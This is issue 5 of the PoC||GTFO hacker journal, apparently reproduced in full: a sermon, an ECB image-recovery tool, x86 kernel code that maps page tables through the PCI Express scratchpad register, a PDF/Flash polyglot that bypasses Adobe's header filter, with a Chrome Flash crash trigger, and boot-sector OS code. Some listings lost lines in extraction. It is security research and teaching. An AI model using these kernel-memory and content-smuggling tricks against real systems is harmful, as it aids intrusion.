5 Address to the Inhabitants of Earth on the following and other Interesting Subjects written for the edification of All Good Neighbors

5:1 It started like this.

In PoCGTFO 5:2, Laphroaig checks his privilege and finds it to be in excellent shape! We are incredibly lucky that our science is mostly pwnage, and that our pwnage is mostly science.

In PoCGTFO 5:3, Philippe Teuwen continues our journal’s strange obsession with ECB mode antics. You see, there’s a teensy little bit of intellectual dishonesty in the famous ECB Penguin, in that the data is encrypted but the metadata is kept in the clear, so there’s no question as to the dimensions of the image. To amend this travesty, Philippe has composed a series of scripts for turning an ECB-encrypted image into a coloring book puzzle by automatically correcting the dimensions, applying a best-guess set of false colors, and then walking a human operator through choosing a final set of colors.

In PoCGTFO 5:4, Jacob Torrey shares a quirky little PoC easter egg that relies on the internals of PCI Express on recent x86 machines. By reflecting traffic through the PCI Express bus, he’s able to map the x86’s virtual memory page table into virtual memory!


PoCGTFO 5:5 explains the trick by Alex Inführ that makes a PDF file that is also an SWF file. We only hope that if Adobe decides—yet again!—to break compatibility with our journal after publication, that they at least be polite enough to whitelist pocorgtfo05.pdf or cite this article.

Shikhin Sethi continues his series of x86 proofs of concept that fit in a 512 byte boot sector. In this installment, he explains how the platform’s interrupts and timers work, then finishes with support for multiple CPUs. You will find his neighborly creation in PoCGTFO 5:6.

Joe FitzPatrick shares some hard earned PCI Express wisdom in PoCGTFO 5:7, presenting a breakout board for the Intel Galileo platform that allows full-sized cards to be plugged into the Mini-PCIe slot of this little guy.

In PoCGTFO 5:8, Matilda puts her own spin on the RDRAND backdoor that Taylor Hornby presented in PoCGTFO 3:6. Whereas he was peeking on the stack in order to sabotage Linux’s random number generation, she instead uses the RDRAND instruction to leak encrypted bytes from kernel memory. A userland process can then decrypt these bytes in order to exfiltrate data, and anyone without the key will be unable to prove that anything important is being leaked.

In PoCGTFO 5:9, neighbor Mik will guide you from spotting an unknown protocol to a PoC that replaces a physical disk in a remote server’s CD-ROM with your own image, over an unencrypted custom KVM session. Bolt-on cryptography is bad, m’kay?

PoCGTFO 5:10 presents a nifty alternative to NOP sleds by Brainsmoke. The idea here is that instead wasting so much space with nop instructions, you can instead load a canary into a register at the beginning of your shellcode, branching back to the beginning if that canary isn’t found at the end.


In PoCGTFO 5:11, we have Michele Spagnuolo’s Rosetta Flash attack for abusing JSONP. While surely you’ve heard about this in the news, please ignore that Google and Tumblr were vulnerable. Instead, pay attention to the mechanism of the exploit. Pay attention to how Michele abuses a decompression routine to produce an alphanumeric payload, which even in isolation would be a worthy PoC!

We all know that hash-collision vulns can be exploited, but the exact practicalities of how to do the exploit or where to look for a vuln aren’t as easy to come by. That’s why, in PoCGTFO 5:12, Ange Albertini and Maria Eichlseder teach us how to write sexy hash-collision PoCs. When our director of funky file formats teams up with a cryptographer, all sorts of nifty things are possible.

In PoCGTFO 5:13, Ben Nagy gives us his take on Coleridge’s masterpiece. Unfortunately, to comply with the Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies, this poem is redacted from our electronic edition.


5:2 Stuff is broken, and only you know how.

by Rvd. Dr. Manul Laphroaig

Gather around, neighbors. We will talk of science and pwnage, and of how lucky we are that our science is (mostly) pwnage, and our pwnage is (mostly) science.

I say that we are lucky, and I mean it, despite there being no lack of folks who look at us askance and would like to build pretty bonfires out of our tools or to set regulators upon us to stand over our shoulders while we work. (Weird reprobates as we are, surely some moral supervision from straight-and-narrow bureaucrats will do us good!)

But consider the bright and wonderful subject-matter with which we work. An exploit is like a natural law: either it works, here and now, or it’s bullshit. Imagine our incredible luck, neighbors: in order to find out something clever about the world, we just need to run a program! Then, if it works, we know immediately that this is how things work. It’s even better than proving a theorem, because every mathematician knows that an exciting freshly-baked proof might contain a mistake; but with a root shell there can be no mistake. Indeed, few are so privileged to discover natural laws just by phrasing them right!1

Now while we puzzle out the secrets of unexpected machines inside machines, other neighbors are after other secrets of the universe, human life, and everything—and consider their plight!

One day there’s a promise of insight into the biochemical mechanisms that make humans selfish or hypocritical—from not just a professor of a respected university, but a Dean2 of such. This is a huge and unexpected step forward, and even newspapers like The New York Times write about it. That research connected selfishness with meat-eating. The connection seemed a bit too simplistic, but sometimes Nature does favor simple answers. Now this is knowledge, neighbor, and you had to work it in—except, as it turns out, it’s likely bullshit, just as the Dean Diederik Stapel’s entire career, built on his many “scientific studies” of record was bullshit. (Look him up in Wikipedia, neighbor!) It was bullshit made up to play on educated people’s stereotypes, to make headlines, to be featured in the Times of New York and of LA, and it totally worked for over a decade. It would’ve worked longer, too, if the fraud wasn’t aiming so high so fast.

Imagine the plight of all the students, underlings, colleagues, and co-authors—all victims of Stapel’s bullshit—who have wasted time building their careers on his crock of bullshit as if it were true insights into what makes humans tick. Some may have had their own research papers rejected by peer reviewers for not having cited Stapel’s flagship results—which were, as you recall, accepted science for over ten years.

Verily I tell you, neighbors, we are so much more fortunate, for in the domain we call ours truth runs and pwns, and bullshit doesn’t run and doesn’t pwn, and nothing can be built on top of bullshit in good faith or in bad faith that would stand to even casual scrutiny. (Well, possibly nothing other than a VC pitch—but judge and be judged, neighbors.) We may be distracted from pwnage by one too many debates, but at least none of these debates are about something called “replication bullying.” If you think this is funny, neighbor, consider that this is a real term, taken from complaints by actual and successful professional scientists. These complaints are about some other scientists who staged the same experiments without involving the original authors and published a paper about how they failed to replicate the original findings. They call this “bullying,” neighbor, and you might want to remember this when you hear that “scientists have shown X” or “linked X and Y.” Verily I tell you, even the hallowed halls of science, blessed with peer-review, are no refuge from bullshit.

We have another tremendous bit of luck, neighbors. In our domain of knowledge, whether 75%, or 99%, or 99.99% of us agree, paid or unpaid, expert or amateur, industry or academic—means nothing. Let me repeat, the consensus of all of us taken together—for whatever definitions of “all” and “together”—means exactly nothing. We may all be wrong, and whoever comes up with an exploit will be right, and that will be that. It happened before, and it will all happen again. We progress by someone noticing what the rest of us have overlooked to date, and if some group of people started counting our publications to learn something about security of computers, we’d tell them to stop wasting their time and ours. Pwnage laughs at majority vote and “consensus”—for these two are, in fact, flagstones on the royal road to being royally pwned.

Is this luck undeserved and unfair, as some would like us to believe? Not so. It is like the luck of a fisherman that he has to spend time on the water, or maybe the luck of a fish that has to live in the water; or the luck of a hunter that he needs to hang out where Mother Nature is constantly munching upon herself. (Stand quietly some late afternoon in a summer meadow, watch dragonflies zip back and forth, and listen. You are hearing the sound of a million lunches, neighbor!)

We see through bullshit because we hunt in its fields and jungles, and we know that wherever there is bullshit that’s where stuff will be badly pwned. Bullshit and pretending that things are understood when they are not are like a watering hole in a parched steppe; ecologies of breakage are ecologies of bullshit and pretense. A good hunter knows to pay attention to the watering holes.

Some of us are hunters of bullshit, others care more about bullshit sneaking into their villages at night, carrying away a pet project here, a young ’un there. But no matter whether a hunter or a guardian, one knows the beast, and where the beast comes from. However you reckon the number of the beast, you all know the names of the beast: Bullshit and Pretense.

Paul Phillips, who walked away after having written a million lines of code for Scala and having closed nine hundred bugs, got to the bottom of this. He spoke of deliberate lies that stayed in the documentation for over three years, as an attempt to make things look less complicated, but in reality making it hard for programmers to be sure whether a bug was in their program or in the language itself:

This is the message it sends: your time is worthless. . . . I don’t want to be a part of something that thinks your time is worthless.

[. . . ]

It’s too complicated, people say it’s too complicated—let’s just not let them see that complicated thing. . . . They told me I’d never have to know. Well, obviously, you do have to know, there’s no way to avoid knowing. It’s only a question of how much you are going to suffer in the course of acquiring this knowledge.

That is a fine sermon against the kind of engineering that ends in bullshit and pretense, neighbors, but it also reveals a deep truth about us. We don’t want to be a part of things that treat people’s time as worthless. More to the point, we cannot stand such things, we simply cannot operate where they rule. We fight, we flee, or we walk away, but in the end we are by and large a community of refugees with an allergy to bullshit.

In the end, neighbors, our privilege may just be an allergy, an allergy to useless waste of time and busy work that makes no sense and brings no improvement. We find ourselves in this oasis of no-bullshit we-don’t-care-what-other-people-think reproducibility for a simple reason that has little to do with luck. We simply fled here from the dark lands where Bullshit reigned supreme, where the very air was laden with its reek, and where we would succumb to our allergy in fairly short order, but not before being branded as disagreeable, lazy, or hubris-prone. We defied the gods of these places (which was what hubris originally meant,) and we are a nation of immigrants in our Chosen Vale of No-Bullshit.

Rejoice, then, and give a thought to neighbors who still suffer—and reach out to them with a good word, a friendly PoC, or a copy of this fine journal when you feel extra neighborly! For your allergy to bullshit, your hubris, your impatience, and your distaste for busy-work may make poor privilege, but that is what we’ve got to share, and share it we shall.

Go now in pwnage, share your privilege,
and help deliver neighbors from bullshit.

5:3 ECB as an Electronic Coloring Book

by Philippe Teuwen

Hey boys and girls, remember Natalie and Ben’s warnings in PoCGTFO 4:13 about ECB? Forbidden things are attractive, I know, I was young too. Let’s explore that area together so that you’ll have fun and you’ll always remember not to use ECB later in your grown-up life.

But first of all let me clarify one thing: the ubiquitous ECB penguin is a kind of a fraud, brandished like a scarecrow! The reality when you get an encrypted image in ECB mode is that you’ve no clue of its characteristics, its size, its pixel representation. Let’s take another example than the penguin (as the source image of this fraud seems to be lost forever). A wrong guess, such as assuming a square format, will render just a meaningless bunch of static.


Ange Albertini’s extensions to the ECB Penguin.

So to get the penguin back, the penguin’s author cheated and encrypted only the pixel values, but not the description of the image, such as its size. Moreover he probably tried different keys until he got the tuxedo as black as possible as he has no control on the encrypted result.

Does it mean ECB is not that bad? Don’t get me wrong, ECB is a very bad way to encrypt and we’ll blow it apart. But what’s ECB? No need to understand the underlying crypto, just that the image is being sliced in small pieces—sixteen bytes wide in case of AES-ECB—and each piece is replaced by random garbage. Identical pieces are replaced by the same random data and if two pieces are different their respective encrypted versions are too. That’s why we can distinguish the penguin.

But we can do much better; instead of displaying directly the mangled pixels we can paint them! We know that identical blocks of random data represent the encrypted version of the same initial block of color, so let’s pick a color ourselves and paint over those similar pieces. That’s what this little program does. You’ll find it as ElectronicColoringBook.py by unzipping pocorgtfo05.pdf.3 It also tries to guess the right ratio by checking which one will give columns of pixels as coherent as possible.

$ ElectronicColoringBook.py test.bin


Already better! The lines are properly aligned but the image is too flat. That’s because we painted each byte as one pixel but the original image was probably created with three bytes per pixel, so let’s fix that.

$ ElectronicColoringBook.py test.bin –pixelwidth=3


As we don’t know the original colors, the tool is choosing some randomly at each execution. Now that the ratio and pixel width are correct we can observe vertical stripes. That’s what happens when you can’t have an exact number of pixels in each block and that’s exactly the case here. We guessed that each pixel requires three bytes and the blocks are 16-byte wide so if some pixels of the same color—let’s say #AABBCC—are side by side we get three types of encrypted blocks. See Figure 5.1


Figure 5.1: Three ways to encrypt the same color pattern.

So we’ve got three types of encrypted data for the same color, repeating over and over. Still one last complication: Pluto’s tail is visible on the left of the image, because before the encrypted pixels there is the encrypted file header. So we’ll apply a small offset to skip it, and as before we’ll group blocks by three.

$ ElectronicColoringBook.py test.bin -p 3 –groups=3 –offset=1


And now let’s make it a real coloring book by choosing those colors ourselves! We’ll draw the ten most frequent colors in white (#ffffff) and the remaining blocks, which typically contain all kinds of transitions from one color area to another one, in black (#000000).

   $ ElectronicColoringBook.py test.bin -p 3 -g 3 -o 1 –palette=



Kids, those colors are encoded with their RGB values. If this is confusing, ask the geekiest of your parents; she can help you. Colors are sorted by largest areas, so let’s keep the white color for the background. Let’s paint Pluto in orange (#fcb604) and Mickey’s head in black.

   $ ElectronicColoringBook.py test.bin -p 3 -g 3 -o 1 -P



If you don’t know which area corresponds to which color in the palette, just try it out with a flashy color. Eventually, we wind up with something like this.

   $ ElectronicColoringBook.py test.bin -p 3 -g 3 -o 1 -P



Note to copyright owners:
We were careful to disclose only images encrypted with AES-256 and a random key that was immediately destroyed. This should be safe enough, right?

Much better than the ECB penguin, don’t you think? So remember that ECB should really stand for “Electronic Coloring Book.” They should therefore should be only used by kids to have fun, never by grown-ups for a serious job!

Maybe Dad is wondering why we didn’t use a picture of Lenna as in any decent scientific paper about image processing? Tell him simply that it’s for a coloring book, not Playboy! There are more complex examples and explanations in the project directory. It’s even possible to colorize other things, such as binaries or XORed images!


5:4 An Easter Egg in PCI Express

by Jacob Torrey

Dear Pastor Laphroaig,

Please consider the following submission to your church newsletter. I hope you think it worthy of your holy parishioners and readers.

Our friends at Intel are always providing Easter eggs for us to enjoy, and having stumbled across a new one for x86, the most neighborly option was naturally to share with all interested parties. This PoC uses a weird quirk in which a newer x86 feature-set breaks security guarantees from older version. Specifically, the newer PCI Express configuration space access mechanism breaks virtual memory. Virtual memory is orchestrated by the CR3 register (storing the physical address of the page tables) and the page tables themselves. An issue with kernel shellcode and live memory forensics is that unless the virtual address of the page tables is known, it is impossible to map them (or any other physical address for that matter) into virtual memory, resulting in a chicken-and-egg problem. Luckily, most operating systems keep the page tables at a known virtual address (0xC0000000 on many Windows systems), but this Easter egg allows access to the page tables on any OS.

In kernel space, CR3 can be read, providing the physical address of the OS page tables; however, due to Intel’s virtual memory protections, there is no way to create a recursive virtual mapping to that physical address. All that is needed is a way to write an arbitrary 32 bits (which will become a PDE mapping in the page tables) to a known physical address. This is the crux of the issue, and the security of virtual memory depends on it. Luckily, with the advent of PCI Express, there is now the “Enhanced Configuration Access Mechanism” (ECAM), which shadows PCI configuration space registers into physical memory at an address kept in the PCIEXPBAR register (D0:F0 offset: 0x60). This is typically enabled on all the systems the author has come across, but your mileage may vary. With this ECAM, changes made to the configuration space via the legacy port I/O mechanism (0xCF8/0xCFC) will be reflected in physical memory. Now all that is needed is a register in configuration space that is at least 32 bits wide and can be changed to an arbitrary value without impacting the system. Again, Intel is looking out for our church, and through their grace, they provide a “Scratchpad Data” register (D0:F0 offset: 0xDC) that has no semantic meaning, just a location for software to store data. Now we have the function ModifyPM() for physical memory. (This is for 32-bit Windows without PAE, running as driver code.)


 2     Sets up the PDE to map in the real PDT using the
       MMIO ranges of PCI Configuration space
 4     @return The PCIEXPBAR for comparison
 6 ULONG ModifyPM()
 8   ULONG MMIORange = 0;
10   {
12     // Utilize the scratch pad register
       // as our mini-PDE
14     mov ebx , cr3
       // This is going to hold our new PDE
16     // (The bits in CR3 with the least
       // significant stuff removed)
18     and ebx, 0xFFC00000
       or ebx, 0x83         // P | RW | PS
       mov dx, 0x0cf8
22     mov eax, 0x800000DC // Offset 0x37 (0xDC / 4)
       out dx, eax
       mov dx, 0x0CFC

26     mov eax, ebx
       out dx, eax // Write our PDE
       // Determine where in physical memory
30     // we can find the PDE
       mov dx, 0x0cf8
32     mov eax, 0x80000060
       out dx, eax
       mov dx, 0x0CFC
36     in eax, dx
       mov MMIORange, eax // Save value and BAM !
40   }

42   if(VDEBUG)
       DbgPrint("MMIO Base Address: %x",
44              MMIORange);

46   return MMIORange;

Once the scratchpad register is primed and ready, and the physical address of the ECAM is known, the next step is to treat the register as a PDE mapping in the OS page tables to add a recursive mapping at a known location.

  1 /**
         Sets up a recursive mapping to the OS page directory
  3      I commented it very thoroughly because it's quite complex.

  5      Basically it:
         -> Saves the current (real) CR3 value
  7      -> Creates a new PDE to map in the (real) PDT
         -> Creates a virtual address using the (fake) PDE we
  9         inserted in ModifyPM
         -> Switches to the (fake) CR3 and utilizes the constructed
 11         virtual address to insert the new recursive mapping
            into the (real) PDT
 13      -> Switches the CR3 back and continues on smugly
 15 ULONG recurMap ()
 17     ULONG MMIORange = 0;
        ULONG PDEBase = 0;
 19     ULONG PDEoffset = 0;

 21     // Sets up the (fake) PDE and
        MMIORange = ModifyPM();
 23     MMIORange &= 0xF0000000;

 25     if(VDEBUG)
            DbgPrint("Mapping PDT to itself");
        __asm {
 29         cli

 31         pushad

 33         // Save the current CR3,
            // seems like overkill, but it makes sense
 35         mov ebx, cr3 // Copy to construct our virtual address
            mov ecx, cr3 // Save a copy so we don't mess up things
            mov edx, MMIORange // Our new CR3 val
            // Setup our virtual address
 41         and ebx, 0x003FFFFF  // Gets us our offset into stuff
            or ebx , 0x0DC00000  // Reference the PDE offset
 43                              // of (0x37 << 22)
            // EBX should now have our virtual address :)
        // Tests to see if the PDE is free for use
 47     test_pde:
 49         add ebx, 0x4 // Offset to unused PDE

 51         // Keep the offset var up to date
            // (but uint32 aligned, not uint8)
 53         mov eax, PDEoffset
            add eax, 0x1
 55         mov PDEoffset, eax
 57         //*************** BEGIN CRITICAL SECTION
            mov cr3, edx  // Inject our new CR3
            mov eax, [ebx]  // Add our mirthful PDE entry,
 61                         // which should map in the PD
            invlpg [ebx]    // Invalidates the virtual address we
 63                         // used just in case it could cause
                            // later problems.
            mov cr3, ecx   // Restore everything nicely

 67         //*************** END CRITICAL SECTION
            cmp eax, 0    // Can we use this entry?
 69         je inject_pde // Try the next one
            jmp test_pde  // Found an empty one, w00t!
        // Injects our recursive PDE into the PDT
 73     inject_pde:
            // Setup our recursive PDE (again)
 75         mov eax, cr3 // A copy to mod for new recursive PDE
            and eax, 0xFFC00000 // Only the most significant bits
 77                             // stay for 4M pages
            or eax, 0x93 // P | RW | PS | PCD
 79         // EAX now has the same PDE to put into the real PDT
            //*************** BEGIN CRITICAL SECTION
 81         mov cr3, edx     // Inject our new CR3

 83         mov [ebx], eax     // Add our mirthful PDE entry which
                               // should map in the PD
 85         invlpg [ ebx ]     // Invalidates the virtual address we
                               // used just in case it could cause
 87                            // later problems

 89         mov cr3 , ecx     // Restore everything nicely
            //***************    END CRITICAL SECTION
            // Determine the v. address of the base of the PDT
 93         // (remembering the differences in alignment)
            mov eax, cr3 // A copy to modify for
 95                      // our new recursive PDE
            and eax, 0x003FFFFF // Only the most significant
 97                             // bits stay for 4M pages
            mov ebx, PDEoffset
 99         shl ebx, 22 // Offset into the PDT
            or eax, ebx
101         mov PDEoffset, eax

103         popad

105         sti
        if (VDEBUG)
109          DbgPrint("Mapping complete."
                      "should be mapped in at 0x%x!",
111                   PDEoffset);
        return PDEoffset;
113 }

This code, on a 32-bit non-PAE system, will return the virtual address that maps in the page directory and allows you to map in arbitrary physical memory as a known location. It should be noted that kernel privileges are needed (to access CR3) and to operate on a kernel page marked as Global so as to persist through the CR3 changes. The author hopes you enjoyed this weird machine and remember to treat your input data as formally as code, for only you can prevent vulnerabilities!



5:5 A Flash PDF Polyglot

by Alex Inführ

PDF and SWF Reunited

I had the idea of creating a nice little file, one which is both a valid PDF and a valid Flash file. Such a polyglot can cause a lot of trouble, because they can smuggle active content like Flash in a harmless file type, PDF.4 The PDF format is a really good container format, because the Adobe PDF parser is not very strict. The PDF header “%PDF-” does not have to be at offset 0; the parser will search the first 1,017 bytes for the header. Recently, however, Adobe decided to stop supporting PDF files that start either with CWS or FWS at offset 0. Both are possible headers for a Flash file. This should make it harder to create such polyglots.

Main File Structure

Unlike PDF, Flash files always need their header at offset 0. It is not possible to insert any data before it. To fulfill this requirement, we need to find a way to bypass Adobe’s prohibition of Flash headers. The next step requires the PDF header to be embedded in the first 1,017 bytes without destroying the Flash file. If we meet all these requirements, we will be able to append the rest of the PDF data at the end of the file.

Bypassing the Header Restriction

The bypass was rather simple, all you have to do is open the SWF file format specification to page 27.5

The specification mentions three possible headers: “FWS”, “CWS” and “ZWS”. FWS is used for uncompressed Flash files, CWS for ZLIB compressed files and ZWS for LZMA compressed files. Maybe you’ve guessed it already, but Adobe forgot to block the ZWS header. For now the file structure looks like this:

1 >>> structure [0:3]
3 >>> structure [4:]
  [...Flash data ...][... PDF data ...]

The Missing PDF Header

The last thing missing is the PDF header. Let’s look in the Flash specification for a place. In the header the length of the uncompressed Flash file is stored at offset 0x04, requiring four bytes. It seems to be useless, as no Flash parser seems to use this field! This means we can overwrite it with the PDF header, but we are missing one byte. The SWF specification defines the Flash version at offset 0x03. Combined with the following four-byte length field, we have a perfect place for the PDF header! Our header structure looks like this.

  >>> structure[0:3]
  >>> structure[3:8]
4 %PDF-
  >>> structure[8:]
6 [...Flash data...][...PDF data...]

This is all it requires, but there is more!

The Madness

For unknown reasons the Flash file needs to be bigger than a certain size. I hard coded this size in my script. If the Flash file is too small, the created polyglot won’t be rendered by the Adobe PDF reader, which makes no sense. I tested the PDF/Flash polyglot across a number of different browsers, and the results are very interesting. Please test it with your own systems.

• Windows 8 32 Bit:

– IE 11: PDF parsed, Flash not parsed

– Chrome: PDF parsed, Flash not parsed

– Firefox: PDF not parsed, Flash parsed

– Adobe Reader 11.0.07: PDF parsed

• Windows 7 64 Bit:

– IE 11: PDF parsed, Flash not parsed

– Chrome: PDF parsed, Flash parsed

– Firefox: PDF not parsed, Flash parsed

– Opera: PDF parsed, Flash parsed

– Adobe Reader 11.0.07: PDF parsed

• Windows 7 Enterprise 32 Bit:

– IE 11: PDF parsed, Flash parsed

– Chrome: PDF parsed, Flash not parsed

– Firefox: PDF not parsed, Flash parsed

– Adobe Reader 11.0.07: PDF parsed

As you can see, IE and Chrome are not consistent between different operating systems, which seems really odd. But I have one little trick left!

Chrome Flash Player Crash!

While playing with the values of the Flash header I came across a crash in the 64 bit version of Chrome’s Flash Player. At offset 0x0f and 0x10 a part of the dictionary size is stored. This is used in the LZMA compression algorithm. Changing these to a high value like 0xBEEF will trigger a crash. Extending this crash to an exploit, or determining that it isn’t exploitable, is left as an exercise for the reader.

  >>> structure[0x0f:0x11]
2 ? (0xbeef)


5:6 These Philosophers Stuff on 512 Bytes; or, This Multiprocessing OS is a Boot Sector.

by Shikhin Sethi, Merchant of 3.5” Niftiness

The first article of this series6 left the reader with a clean canvas, covering the early initialization of a 80x86 CPU along with its memory management unit. In the second installment, we will cover the x86 interrupts architecture, and timer usage. We’ll also take a look at multiprocessing, how to handle interrupt requests from devices with multiple CPUs at the helm, and finish with a serving of stuffed philosophers–—in 512 bytes!

Privilege levels

To control the access of resources granted to any program, the x86 architecture, starting from the 80286, features four privilege levels, level 0 to level 3, where 0 is the most privileged, and 3 is the least. Since the privilege model follows a hierarchical ring-like system, each level is also known as a Ring. The Current Privilege Level (CPL) is cached in the two lowest bits of the CS register, and is set as per the privilege level in the Defined Privilege Level (DPL) field of the Code Segment Descriptor.

To control the programmed I/O privilege of any program, the I/O Privilege Level (IOPL) flag can be used. A thread can only access I/O ports—and use certain privileged instructions—when its CPL is less than or equal to the IOPL.

Traditionally, Ring 0 is used by the kernel while Ring 3 is used by user-level applications. Modern microkernels can utilize Rings 1 and 2 to offload drivers to a less privileged ring still granting I/O privileges.


In the event an external hardware needs to specify the occurrence of an event to the CPU, the hardware emits a signal known as an Interrupt Request (IRQ). The CPU, based on the IRQ and an Interrupt Vector Table, then transfers control to an interrupt handler (Interrupt Service Routine) associated with the IRQ. The handler performs the requisite action, acknowledges the handling of the request to the device, and returns execution back to the interrupted thread.

The same mechanism used to handle IRQs is further extended to accommodate both Exceptions and System Calls.

• Exceptions: On facing any illegal instruction or operation, the processor raises an exception, corresponding to a vector in the vector table. The operating system can then either handle the exception, or terminate execution of the faulting thread.


• System Calls: All modern architectures feature a special instruction to raise an interrupt, thus allowing user-mode software to utilize the mechanism for calls into the kernel. For example, Linux uses the vector 0x80 on x86 for system calls.

The Interrupt Enable Flag (IF) in the (E)FLAGS register allows the kernel to mask hardware interrupts. The instructions cli (clear interrupts) and sti (set interrupts) disable and enable hardware interrupts. Both instructions are privileged as per what IOPL is set to.

Interrupt Vector Table (IVT)

Prior to the introduction of protected mode, the IVT was used to specify the address of all 256 interrupt handlers. Each handler was represented by a 4-byte segment:offset pair, and the IVT is located at 0x0000:0x0000 by default.

The 80286 introduced the lidt instruction, which also allowed the IVT to be relocated to another address in conventional memory.

Interrupt Descriptor Table (IDT)

With protected mode, the IVT was superseded by the Interrupt Descriptor Table. Each entry in the IDT was called a gate, and they were classified as:

• Interrupt Gates: The CPU pushes the EFLAGS register, the CS segment, and the return EIP on the stack before handling control to the interrupt handler. Interrupts are automatically disabled upon entry, and are restored when the EFLAGS register is popped back.

• Trap Gates: Trap gates are similar to interrupt gates, but interrupts are not masked upon entry.

• Task Gates: Task gates were intended to be used for hardware multitasking, but software multitasking has been preferred over it.

Similar to the Global Descriptor Table Register, an IDTR is used to keep track of the size and location of the IDT.

 2     ; Size of IDT - 1.
       dw (256 * 8) - 1
 4     dd idt

 6 ; ecx: interrupt vector.
   ; eax: the interrupt handler.
 8 ; Trash edi.
10     ; The entry into the table.
       lea edi, [idt + ecx * 4]
       ; The first two bytes specify the lower 16-bits
14     ; of the interrupt handler.
       mov [edi], ax
16     shr ax, 16

18     ; The upper-most two bytes specify the
       ; highest 16 bits.
20     mov [edi + 6], ax

22     ; The third and fourth byte specify the selector
       ; of the interrupt function, 0x08 in this case.
24     ; The fifth byte is reserved 0.
       ; The sixth byte is for flags:
26     ;   Bits 0:3 -> type. 0x0E is 32-bit interrupt gate.
       ;   Bits 5:6 -> the privilege level the calling
28     ;               descriptor should have.
       ;   Bit 7 -> present flag.
30     mov dword [edi + 2], 0x08 | (1 << 31) | (0x0E << 24)

Programmable Interrupt Controller (PIC)

To route hardware interrupts, the IBM PC and XT used the 8259 PIC chip which was able to handle 8 IRQs. Traditionally, these were mapped by the BIOS to interrupts 8 to 15, so as to not collide with the original exceptions.

With the IBM PC/AT, the system was extended to incorporate two 8259 PICs, where one acts as a master and the other as a slave. Only the master is able to signal the processor, and the slave uses IRQ line 2 to signal to the master a pending interrupt. Since this implies that IRQ 2 is unavailable for use by devices, most motherboards reroute IRQ 2 to IRQ 9 to maintain backwards compatibility.

Both PIC chips have an offset variable. Whenever an unmasked input line is raised, they add the input line to the offset, to form the requested interrupt number. By convention, the BIOS routes IRQs 0 to 7 to interrupts 8 to 15, and IRQs 8 to 15 to interrupts 112 to 119. After handling an interrupt, the PIC chips need a End Of Interrupt (EOI) command to ascertain that the interrupt isn’t pending. For interrupts cascaded from the slave to the master, both the PIC chips need a EOI.

With the 80286, Intel extended exceptions to cover interrupt vectors 0x00 to 0x1F. Hence, the master 8259’s configuration collided with the exception range. To properly configure the PIC, both the master and the slave controllers can be remapped with a proper offset. However, since we do not require any interrupts from devices, we’ll mask all interrupt lines:

1 ; Each bit specifies each line.
  mov al, 0xFF
3 ; For the master PIC.
  out 0xA1, al
5 ; For the slave PIC.
  out 0x21, al

Programmable Interval Timer (PIT)

The x86 architecture features the Intel 8253/8254 as the de facto Programmable Interval Timer. The timer has three channels with individual counters; the first was used for time keeping and got routed to IRQ 0. The second channel was used to trigger the refresh of DRAM, while the third was used to program the PC speaker. Each channel can be operated in any one of six modes. Although covering the entire functioning of the 8253 is out of the scope of this article, we will take a specific look at programming channel 2 for a one-shot timer.

The PIT uses an oscillator running at 1.19318166 MHz. The IBM PC borrowed from television circuitry a single base oscillator at 14.31818 MHz. The CPU divided this by 3 for its frequency, while the CGA video controller divided this by 4. Both the signals were passed through a logical AND gate to attain the frequency for the PIT. A counter is used as a frequency divider to fine-tune the frequency provided by the PIT. The counter is decreased using the base frequency, and a pulse is generated when it reaches zero.

The presence of a local APIC can be detected via the CPUID feature flags. Certain systems allow the configuration of the LAPIC via a IA32_APIC_BASE Model-Specific Register (MSR). However, in most cases, once the LAPIC is disabled via the MSR, it cannot be set without resetting the CPU.

Although the output of channel 2 is routed to the PC speaker, the channel offers a software-controllable gate input, and allows us to check the output status without enabling interrupts. We will use channel 2 in conjunction with mode 1, the hardware re-triggerable one-shot.

In mode 1, on the rising edge of the gate input, the timer reloads the current count with the value specified. It sets the output signal as low, and on each falling edge of the oscillator, the value of the current count is decremented. Once the current count reaches zero, the output signal goes high until the timer is reset. The state of the output signal can be checked by I/O port 0x61.

   ; Port 0x43 is the command register.
 2 ; 0b -> 16-bit binary mode, specifying the reload value.
   ; 001b -> mode 1, hardware re-triggerable one-shot.
 4 ; 11b -> lobyte/hibyte access mode.
   ; 10b -> channel 2.
 6 mov al, 10110010b
   out 0x43, al
   ; We set a frequency of 100 Hz.
10 ; 1193182/100 = 0x2E9C.
   ; Low byte.
12 mov al, 0x9C
   out 0x42, al
14 ; High byte.
   mov al, 0x2E
16 out 0x42, al

The timer can then be started by raising the gate input:

  ; Start the PIT channel 2 timer.
2 in al, 0x61
  and al, 0xFE
4 out 0x61, al
  or al, 1
6 out 0x61, al

The output signal can also be determined:

  in al, 0x61
2 ; Bit 5 specifies if the output is high or not.
  and al, 0x20


With multiple processors, the interrupt routing mechanism is decoupled into two units: the Local Advanced Programmable Interrupt Controller (LAPIC) and the I/O APIC. Each LAPIC is integrated into the processor,7 and is used to manage external interrupts. The LAPIC is also used for generating Inter-Processor Interrupts (IPI), which play a pivotal role in initializing other logical processors. The I/O APIC is used for interrupt routing from external sources to a specific local APIC, and acts as a modern replacement for the PIC.

Although the MultiProcessor Specification specifies the base of the local APIC as 0xFEE00000, the base address can be overridden. Due to space constraints in our proof-of-concept, we assume the base address to be 0xFEE00000. Each register in the local APIC memory space can only be accessed by a 32-bit read/write.8

To handle certain race conditions, such as an interrupt being masked before it is dispensed, the local APIC generates a spurious-interrupt. The spurious interrupt handler needs to be only set to a dummy interrupt handler.

1 ; Bit 8 enables the LAPIC.
  ; Bits 0 to 7 specify the vector of the
3 ;            spurious interrupt handler.
  ; We set it to 63 (bits 0 to 3 are hardwired 1).
5 mov esi, local_apic
  mov dword [local_apic+spurious_int_vec_reg], (1<<8)|(11b<<4)

Application Processor (AP) Start-Up

The logical processor that the BIOS hands control over to is termed as the bootstrap processor, while all other processors in the system are called as application processors. Each AP is uniquely identified by a local APIC ID assigned to its LAPIC.

To initialize a logical processor, an INIT IPI is first sent to the respective local APIC. On receiving the IPI, the LAPIC causes the processor to reset its state and start executing from a fixed location. After the successful handling of the INIT IPI, a STARTUP IPI commands the processor to start executing from a specified page.9

   mov si, trampoline
 2 mov di, 0x7000
   mov cx, trampoline_end - trampoline
 4 rep movsb

 6 ; Send the INIT IPI.
   ; 101b -> INIT.
 8 ; 1 << 14 -> level.
   ; 11b << 18 -> all excluding self.
10 mov dword [local_apic+icr_low], (101b<<8)|(1<<14)|(11b<<18)

12 ; Start the PIT channel 2 timer.
   in al, 0x61

14 and al, 0xFE
   out 0x61, al
16 or al, 1
   out 0x61, al
20     in al, 0x61
